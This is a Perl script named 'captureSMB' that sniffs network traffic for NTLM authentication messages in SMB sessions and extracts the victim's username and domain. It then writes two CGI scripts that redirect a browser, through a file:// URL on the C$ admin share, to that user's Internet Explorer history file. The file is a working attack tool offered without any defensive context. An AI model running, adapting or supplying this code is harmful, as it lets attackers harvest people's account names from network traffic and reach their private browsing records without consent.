#!/ARCHIV~1/Perl/bin/perl -w

use Net::Pcap;
use NetPacket::Ethernet;
use NetPacket::IP;
use NetPacket::TCP;
use strict;

my $err;
my $dev;

print "captureSMB v1.0:\n\n";

my $filename;

#determine all available devices, and later pick up one
my @devList = Net::Pcap::findalldevs(\$err);
if (defined $err) {
    die 'Unable to determine network device list for monitoring - ', $err;
}

print "The following devices were found:\n";
my ($address, $netmask);
for $dev (@devList){
	if (Net::Pcap::lookupnet($dev, \$address, \$netmask, \$err)) {
		die 'Unable to look up device information for ', $dev, ' - ', $err;
		}
	print "$dev : $address/$netmask\n"; 
	}

#I will pick up my wireless card here
print "\nchoose a device number (0,1,...): ";
my $devNumber = <>;
$dev = $devList[$devNumber];
print "\nchoosing $dev\n"; 
Net::Pcap::lookupnet($dev, \$address, \$netmask, \$err);

#create a packet capture descriptor
#Net::Pcap::open_live($dev, $snaplen, $promisc, $to_ms, \$err);	
my $object;
$object = Net::Pcap::open_live($dev, 1500, 0, 0, \$err);

#create a filter for capturing only SMB traffic (
#port 445 -> SMB over TCP/IP
#(ether[125] == 3) && (ether[126] == 0) && (ether[127] == 0) && (ether[128] == 0) -> NTLM message type: NTLMSSP_AUTH
#(ether[203] != 0) -> LanManager response !=0, so this is not the first attempt (anonymous access to the requested resource)
my $filter;
#Net::Pcap::compile($object, \$filter, 'port 445', 0, $netmask) && die 'Unable to compile packet capture filter';# && (ether[125] == 3) && (ether[126] == 0) && (ether[127] == 0) && (ether[128] == 0) && (ether[203] != 0)

#FILTERS ARE NOT WORKING WELL, SO I WILL NOT USE THEM
#and set the filter
#Net::Pcap::setfilter($object, $filter) && die 'Unable to set packet capture filter';
#Net::Pcap::compile(
#    $object, 
#    \$filter, 
#    '(port 445)', 
#    0, 
#    $netmask
#) && die 'Unable to compile packet capture filter';
#Net::Pcap::setfilter($object, $filter) && die 'Unable to set packet capture filter';

#and stablish the callback funcion for processing the captured data
#Net::Pcap::loop($object, $count, \&callback_function, $user_data)
print "\nstarting capture... \n"; 
Net::Pcap::loop($object, -1, \&smb_packets, '') || die 'Unable to perform packet capture';
sub smb_packets {
    my ($user_data, $header, $packet) = @_;

	#dump the packet in hexa to a variable
	my $hex_data=unpack('H*', $packet);

	#and now...if NTLMSSP and NTLMSSP_AUTH and NTLM response length <> 1
	if (($hex_data =~ m/4e544c4d5353500003000000/) and ($hex_data !~ m/4e544c4d535350000300000001000100/)){
	    #Strip ethernet encapsulation of captured packet 
	    my $ether_data = NetPacket::Ethernet::strip($packet);

	    #Decode contents of TCP/IP packet contained within  captured ethernet packet
	    my $ip = NetPacket::IP->decode($ether_data);
	    my $tcp = NetPacket::TCP->decode($ip->{'data'});

		#my $tcp_data = NetPacket::TCP::strip($packet);
		my $tcp_data = $tcp->{'data'};

		print
			"\n\n***** SMB REQUEST *****\n",
	        $ip->{'src_ip'}, ":", $tcp->{'src_port'}, " -> ",
	        $ip->{'dest_ip'}, ":", $tcp->{'dest_port'}, "\n";

		#now, I need to extract  the hostname (domain name) and the username string's length and offset. Their positions in the packet are:
		# NTLMSSP | NTLMSSP_AUTH | LM Response [Length, Maxlength, Offset] [2,2,4 - 8 hexadecimal positions, 16 bytes in my string] | NTLM Response ([Length, Maxlength, Offset] [2,2,4 - 8 hexadecimal positions, 16 bytes in my string]  | Domain name [Length, Maxlength, Offset] [2,2,4 - 8 hexadecimal positions, 16 bytes in my string] 
		my $NTLMSSP=index($hex_data,"4e544c4d5353500003000000",);
		my $domainname_hex_length=substr($hex_data, $NTLMSSP + length("4e544c4d5353500003000000") + 16 + 16 + 2,2).substr($hex_data, $NTLMSSP + length("4e544c4d5353500003000000") + 16 + 16,2);
		my $domainname_length=sprintf("%d", hex($domainname_hex_length)); 

		my $domainname_hex_offset=substr($hex_data, $NTLMSSP + length("4e544c4d5353500003000000") + 16 + 16 + 4 + 4 + 2,2).substr($hex_data, $NTLMSSP + length("4e544c4d5353500003000000") + 16 + 16 + 4 + 4,2);
		my $domainname_offset=sprintf("%d", hex($domainname_hex_offset)); 

		my $username_hex_lenght=substr($hex_data, $NTLMSSP + length("4e544c4d5353500003000000") + 16 + 16 + 16 + 2,2).substr($hex_data, $NTLMSSP + length("4e544c4d5353500003000000") + 16 + 16 + 16,2);
		my $username_lenght=sprintf("%d", hex($username_hex_lenght)); 
		
		my $username_hex_offset=substr($hex_data, $NTLMSSP + length("4e544c4d5353500003000000") + 16 + 16 + 16 + 4 + 4 + 2,2).substr($hex_data, $NTLMSSP + length("4e544c4d5353500003000000") + 16 + 16 + 16 + 4 + 4,2);
		my $username_offset=sprintf("%d", hex($username_hex_offset)); 
		
		#ok, having this information, Now I will extract username and domain name from the packet. Sum it twice cause: 1 byte in packet = 2 bytes in my string
		my $domainname_unfiltered = substr($hex_data, $NTLMSSP + $domainname_offset + $domainname_offset, $domainname_length + $domainname_length);
		my $username_unfiltered = substr($hex_data, $NTLMSSP + $username_offset + $username_offset, $username_lenght + $username_lenght);
		
		#and now...parse the results, and translate
		my $domainname='';
		for(my $start=1;$start< length($domainname_unfiltered);$start+=4) {
			$domainname= $domainname.pack('H2',substr($domainname_unfiltered,$start-1,2));
			}
		
		my $username='';
		for(my $start=1;$start< length($username_unfiltered);$start+=4) {
			$username= $username.pack('H2',substr($username_unfiltered,$start-1,2));
			}

		print "username: ".$username."\n";
		print "domainname: ".$domainname."\n";
		
		$username =~ s/\s/%20/g;
		#$domainname =~ s/\s/%20/g;
		$domainname = "127.0.0.1";
		
		$filename = "index.dat.english.pl";
		open (OUTPUT, ">$filename");

		print OUTPUT 	"\#\!/ARCHIV\~1/Perl/bin/perl \-w"."\n\n".
						"print \"Status: 302 Found\\r\\n\"\.\n" .
						"	\"Content-type: text/html\\r\\n\"\.\n" .
						"	\"Location: file://".$domainname."/C\\\$/Documents%20and%20settings/".$username."/Local%20settings/History/History.IE5/index.dat\\r\\n\"\.\n" .
						"	\"\\r\\n\"\;\n";
		close OUTPUT;

		$filename = "index.dat.spanish.pl";
		open (OUTPUT, ">$filename");

		print OUTPUT 	"\#\!/ARCHIV\~1/Perl/bin/perl \-w"."\n\n".
						"print \"Status: 302 Found\\r\\n\"\.\n" .
						"	\"Content-type: text/html\\r\\n\"\.\n" .
						"	\"Location: file://".$domainname."/C\\\$/Documents%20and%20settings/".$username."/Configuracin%20local/Historial/History.IE5/index.dat\\r\\n\"\.\n" .
						"	\"\\r\\n\"\;\n";
		close OUTPUT;
		}
		
}

	
